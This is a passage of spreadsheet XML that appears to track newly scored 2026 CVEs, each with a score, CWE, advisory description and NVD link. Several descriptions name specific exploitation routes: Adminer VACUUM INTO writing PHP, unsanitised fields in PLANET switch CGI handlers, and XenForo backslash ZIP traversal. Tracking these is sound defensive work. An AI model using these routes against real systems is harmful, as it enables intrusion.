      <c r="S511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-34223</t>
        </is>
      </c>
    </row>
    <row r="512">
      <c r="A512" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B512" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56703</t>
        </is>
      </c>
      <c r="D512" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E512" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F512" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G512" s="5" t="inlineStr"/>
      <c r="H512" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I512" s="5" t="inlineStr"/>
      <c r="J512" s="5" t="inlineStr"/>
      <c r="K512" s="5" t="inlineStr"/>
      <c r="L512" s="5" t="inlineStr"/>
      <c r="M512" s="5" t="inlineStr"/>
      <c r="N512" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O512" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P512" s="5" t="inlineStr"/>
      <c r="Q512" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R512" s="5" t="inlineStr">
        <is>
          <t>Adminer before 5.4.3 contains a remote code execution vulnerability in SQLite query handling where VACUUM INTO is not blocked despite ATTACH restrictions. Authenticated attackers can execute VACUUM INTO to write PHP code to arbitrary file paths and execute commands on the server.</t>
        </is>
      </c>
      <c r="S512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56703</t>
        </is>
      </c>
    </row>
    <row r="513">
      <c r="A513" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B513" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61517</t>
        </is>
      </c>
      <c r="D513" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E513" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F513" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G513" s="5" t="inlineStr"/>
      <c r="H513" s="5" t="n">
        <v>0.016</v>
      </c>
      <c r="I513" s="5" t="inlineStr"/>
      <c r="J513" s="5" t="inlineStr"/>
      <c r="K513" s="5" t="inlineStr"/>
      <c r="L513" s="5" t="inlineStr"/>
      <c r="M513" s="5" t="inlineStr"/>
      <c r="N513" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O513" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P513" s="5" t="inlineStr"/>
      <c r="Q513" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R513"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S513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61517</t>
        </is>
      </c>
    </row>
    <row r="514">
      <c r="A514" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B514" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64199</t>
        </is>
      </c>
      <c r="D514" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E514" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F514" s="5" t="inlineStr">
        <is>
          <t>security@ni.com</t>
        </is>
      </c>
      <c r="G514" s="5" t="inlineStr"/>
      <c r="H514" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I514" s="5" t="inlineStr"/>
      <c r="J514" s="5" t="inlineStr"/>
      <c r="K514" s="5" t="inlineStr"/>
      <c r="L514" s="5" t="inlineStr"/>
      <c r="M514" s="5" t="inlineStr"/>
      <c r="N514" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O514" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P514" s="5" t="inlineStr"/>
      <c r="Q514" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R514" s="5" t="inlineStr">
        <is>
          <t>There is an out-of-bounds read vulnerability in DASYLab due to improper validation of user-supplied data.   This results in a read outside the bounds of an allocated data structure.  Successful exploitation requires an attacker to get a user to open a specially crafted .DSB file.  This issue affects all versions before 2026.0.0.</t>
        </is>
      </c>
      <c r="S514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64199</t>
        </is>
      </c>
    </row>
    <row r="515">
      <c r="A515" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B515" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70626</t>
        </is>
      </c>
      <c r="D515" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E515" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F515" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G515" s="5" t="inlineStr"/>
      <c r="H515" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I515" s="5" t="inlineStr"/>
      <c r="J515" s="5" t="inlineStr"/>
      <c r="K515" s="5" t="inlineStr"/>
      <c r="L515" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M515" s="5" t="inlineStr">
        <is>
          <t>3.9.4</t>
        </is>
      </c>
      <c r="N515" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O515" s="5" t="inlineStr"/>
      <c r="P515" s="5" t="inlineStr"/>
      <c r="Q515" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R515" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70626</t>
        </is>
      </c>
    </row>
    <row r="516">
      <c r="A516" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B516" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71504</t>
        </is>
      </c>
      <c r="D516" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E516" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F516" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G516" s="5" t="inlineStr"/>
      <c r="H516" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I516" s="5" t="inlineStr"/>
      <c r="J516" s="5" t="inlineStr"/>
      <c r="K516" s="5" t="inlineStr"/>
      <c r="L516" s="5" t="inlineStr"/>
      <c r="M516" s="5" t="inlineStr"/>
      <c r="N516" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O516" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P516" s="5" t="inlineStr"/>
      <c r="Q516" s="5" t="inlineStr">
        <is>
          <t>CWE-862, CWE-915</t>
        </is>
      </c>
      <c r="R516" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains an improper authorization vulnerability in the Members REST API that allows attackers with only member-creation rights to reset the password of any user account, including the system administrator, without verifying password-change permissions. Attackers can supply an arbitrary user account identifier and new password in the request body to overwrite credentials and immediately lock out the legitimate account holder.</t>
        </is>
      </c>
      <c r="S516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71504</t>
        </is>
      </c>
    </row>
    <row r="517">
      <c r="A517" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B517" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74239</t>
        </is>
      </c>
      <c r="D517" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E517" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F517" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G517" s="5" t="inlineStr"/>
      <c r="H517" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I517" s="5" t="inlineStr"/>
      <c r="J517" s="5" t="inlineStr"/>
      <c r="K517" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L517" s="5" t="inlineStr"/>
      <c r="M517" s="5" t="inlineStr"/>
      <c r="N517" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O517" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P517" s="5" t="inlineStr"/>
      <c r="Q517" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R517" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a path traversal vulnerability in the style archive importer on Windows deployments that allows authenticated non-super administrators with style permissions to write arbitrary files outside the intended extraction directory by using backslash-based traversal sequences in ZIP member names. Attackers can craft a malicious ZIP archive with backslash path separators that bypass forward-slash validation to write arbitrary bytes to any web-server-writable path, including the public web root, achieving persistent code execution as the web-server account.</t>
        </is>
      </c>
      <c r="S517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74239</t>
        </is>
      </c>
    </row>
    <row r="518">
      <c r="A518" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B518" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75121</t>
        </is>
      </c>
      <c r="D518" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E518" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F518" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G518" s="5" t="inlineStr"/>
      <c r="H518" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I518" s="5" t="inlineStr"/>
      <c r="J518" s="5" t="inlineStr"/>
      <c r="K518" s="5" t="inlineStr"/>
      <c r="L518" s="5" t="inlineStr"/>
      <c r="M518" s="5" t="inlineStr"/>
      <c r="N518" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O518" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P518" s="5" t="inlineStr"/>
      <c r="Q518" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R518" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains an authenticated OS command injection vulnerability in /cgi-bin/dispatcher.cgi. The web_vlan_membership_edit_dialog_post handler incorporates the memberTags POST parameter into a shell command without sanitization. A remote authenticated attacker can send a crafted memberTags value to execute arbitrary operating-system commands on the device.</t>
        </is>
      </c>
      <c r="S518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75121</t>
        </is>
      </c>
    </row>
    <row r="519">
      <c r="A519" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B519" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75122</t>
        </is>
      </c>
      <c r="D519" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E519" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F519" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G519" s="5" t="inlineStr"/>
      <c r="H519" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I519" s="5" t="inlineStr"/>
      <c r="J519" s="5" t="inlineStr"/>
      <c r="K519" s="5" t="inlineStr"/>
      <c r="L519" s="5" t="inlineStr"/>
      <c r="M519" s="5" t="inlineStr"/>
      <c r="N519" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O519" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P519" s="5" t="inlineStr"/>
      <c r="Q519" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R519" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains an authenticated OS command injection vulnerability in /cgi-bin/httpuploadcert.cgi. The certificate password field in a certificate upload request is incorporated into a shell command without sanitization of shell metacharacters. A remote attacker with administrator web credentials can submit a crafted certificate upload request to execute arbitrary operating-system commands on the device.</t>
        </is>
      </c>
      <c r="S519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75122</t>
        </is>
      </c>
    </row>
    <row r="520">
      <c r="A520" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B520" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75123</t>
        </is>
      </c>
      <c r="D520" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E520" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F520" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G520" s="5" t="inlineStr"/>
      <c r="H520" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I520" s="5" t="inlineStr"/>
      <c r="J520" s="5" t="inlineStr"/>
      <c r="K520" s="5" t="inlineStr"/>
      <c r="L520" s="5" t="inlineStr"/>
      <c r="M520" s="5" t="inlineStr"/>
      <c r="N520" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O520" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P520" s="5" t="inlineStr"/>
      <c r="Q520" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R520" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains an authenticated OS command injection vulnerability in /cgi-bin/dispatcher.cgi. The web_smtp_test_post handler incorporates a caller-supplied SMTP server value directly into a shell command without sanitization. A remote attacker with administrator web credentials can send a crafted SMTP server value to execute arbitrary operating-system commands on the device.</t>
        </is>
      </c>
      <c r="S520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75123</t>
        </is>
      </c>
    </row>
    <row r="521">
      <c r="A521" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B521" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75990</t>
        </is>
      </c>
      <c r="D521" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E521" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F521" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G521" s="5" t="inlineStr"/>
      <c r="H521" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I521" s="5" t="inlineStr"/>
      <c r="J521" s="5" t="inlineStr"/>
      <c r="K521" s="5" t="inlineStr"/>
      <c r="L521" s="5" t="inlineStr"/>
      <c r="M521" s="5" t="inlineStr"/>
      <c r="N521" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O521" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P521" s="5" t="inlineStr"/>
      <c r="Q521" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R521" s="5" t="inlineStr">
        <is>
          <t>Illustrator is affected by an Incorrect Authorization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S521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75990</t>
        </is>
      </c>
    </row>
    <row r="522">
      <c r="A522" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B522" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75991</t>
        </is>
      </c>
      <c r="D522" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E522" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F522" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G522" s="5" t="inlineStr"/>
      <c r="H522" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I522" s="5" t="inlineStr"/>
      <c r="J522" s="5" t="inlineStr"/>
      <c r="K522" s="5" t="inlineStr"/>
      <c r="L522" s="5" t="inlineStr"/>
      <c r="M522" s="5" t="inlineStr"/>
      <c r="N522" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O522" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P522" s="5" t="inlineStr"/>
      <c r="Q522" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R522" s="5" t="inlineStr">
        <is>
          <t>Illustrator is affected by an Improper Input Validation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S522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75991</t>
        </is>
      </c>
    </row>
    <row r="523">
      <c r="A523" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B523" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76190</t>
        </is>
      </c>
      <c r="D523" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E523" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F523" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G523" s="5" t="inlineStr"/>
      <c r="H523" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I523" s="5" t="inlineStr"/>
      <c r="J523" s="5" t="inlineStr"/>
      <c r="K523" s="5" t="inlineStr"/>
      <c r="L523" s="5" t="inlineStr"/>
      <c r="M523" s="5" t="inlineStr"/>
      <c r="N523" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O523" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P523" s="5" t="inlineStr"/>
      <c r="Q523" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="R523"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S523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76190</t>
        </is>
      </c>
    </row>
    <row r="524">
      <c r="A524" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B524" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76199</t>
        </is>
      </c>
      <c r="D524" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E524" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F524" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G524" s="5" t="inlineStr"/>
      <c r="H524" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I524" s="5" t="inlineStr"/>
      <c r="J524" s="5" t="inlineStr"/>
      <c r="K524" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L524" s="5" t="inlineStr"/>
      <c r="M524" s="5" t="inlineStr"/>
      <c r="N524" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O524" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P524" s="5" t="inlineStr"/>
      <c r="Q524" s="5" t="inlineStr">
        <is>
          <t>CWE-427</t>
        </is>
      </c>
      <c r="R524" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an Uncontrolled Search Path Element vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t>
        </is>
      </c>
      <c r="S524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76199</t>
        </is>
      </c>
    </row>
    <row r="525">
      <c r="A525" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B525" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77109</t>
        </is>
      </c>
      <c r="D525" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E525" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F525" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G525" s="5" t="inlineStr"/>
      <c r="H525" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I525" s="5" t="inlineStr"/>
      <c r="J525" s="5" t="inlineStr"/>
      <c r="K525" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L525" s="5" t="inlineStr"/>
      <c r="M525" s="5" t="inlineStr"/>
      <c r="N525" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O525" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P525" s="5" t="inlineStr"/>
      <c r="Q525" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R525" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. An attacker could leverage this vulnerability to gain elevated access to restricted resources. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="S525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77109</t>
        </is>
      </c>
    </row>
    <row r="526">
      <c r="A526" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B526" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77774</t>
        </is>
      </c>
      <c r="D526" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E526" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G526" s="5" t="inlineStr"/>
      <c r="H526" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I526" s="5" t="inlineStr"/>
      <c r="J526" s="5" t="inlineStr"/>
      <c r="K526" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t>
        </is>
      </c>
      <c r="L526" s="5" t="inlineStr"/>
      <c r="M526" s="5" t="inlineStr"/>
      <c r="N526" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O526" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P526" s="5" t="inlineStr"/>
      <c r="Q526" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R526" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce is affected by an Incorrect Authorization vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized read access. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="S526" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77774</t>
        </is>
      </c>
    </row>
    <row r="527">
      <c r="A527" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B527" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C527" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78675</t>
        </is>
      </c>
      <c r="D527" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E527" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F527" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G527" s="5" t="inlineStr"/>
      <c r="H527" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I527" s="5" t="inlineStr"/>
      <c r="J527" s="5" t="inlineStr"/>
      <c r="K527" s="5" t="inlineStr"/>
      <c r="L527" s="5" t="inlineStr">
        <is>
          <t>pip:GitPython</t>
        </is>
      </c>
      <c r="M527" s="5" t="inlineStr">
        <is>
          <t>3.1.59</t>
        </is>
      </c>
      <c r="N527" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O527" s="5" t="inlineStr"/>
      <c r="P527" s="5" t="inlineStr"/>
      <c r="Q527" s="5" t="inlineStr">
        <is>
          <t>CWE-73, CWE-200</t>
        </is>
      </c>
      <c r="R527" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S527" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78675</t>
        </is>
      </c>
    </row>
    <row r="528">
      <c r="A528" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B528" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C528" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79721</t>
        </is>
      </c>
      <c r="D528" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E528" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F528" s="5" t="inlineStr">
        <is>
          <t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t>
        </is>
      </c>
      <c r="G528" s="5" t="inlineStr"/>
      <c r="H528" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I528" s="5" t="inlineStr"/>
      <c r="J528" s="5" t="inlineStr"/>
      <c r="K528" s="5" t="inlineStr"/>
      <c r="L528" s="5" t="inlineStr"/>
      <c r="M528" s="5" t="inlineStr"/>
      <c r="N528" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O528" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P528" s="5" t="inlineStr"/>
      <c r="Q528" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="R528" s="5" t="inlineStr">
        <is>
          <t>Code execution can occur in versions of the MLflow platform running version 0.0.1 or newer, enabling a maliciously crafted model artifact to execute arbitrary code on an end user's system when loaded by the project.</t>
        </is>
      </c>
      <c r="S528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79721</t>
        </is>
      </c>
    </row>
    <row r="529">
      <c r="A529" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B529" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80097</t>
        </is>
      </c>
      <c r="D529" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E529" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F529" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G529" s="5" t="inlineStr"/>
      <c r="H529" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I529" s="5" t="inlineStr"/>
      <c r="J529" s="5" t="inlineStr"/>
      <c r="K529" s="5" t="inlineStr"/>
      <c r="L529" s="5" t="inlineStr"/>
      <c r="M529" s="5" t="inlineStr"/>
      <c r="N529" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O529" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P529" s="5" t="inlineStr"/>
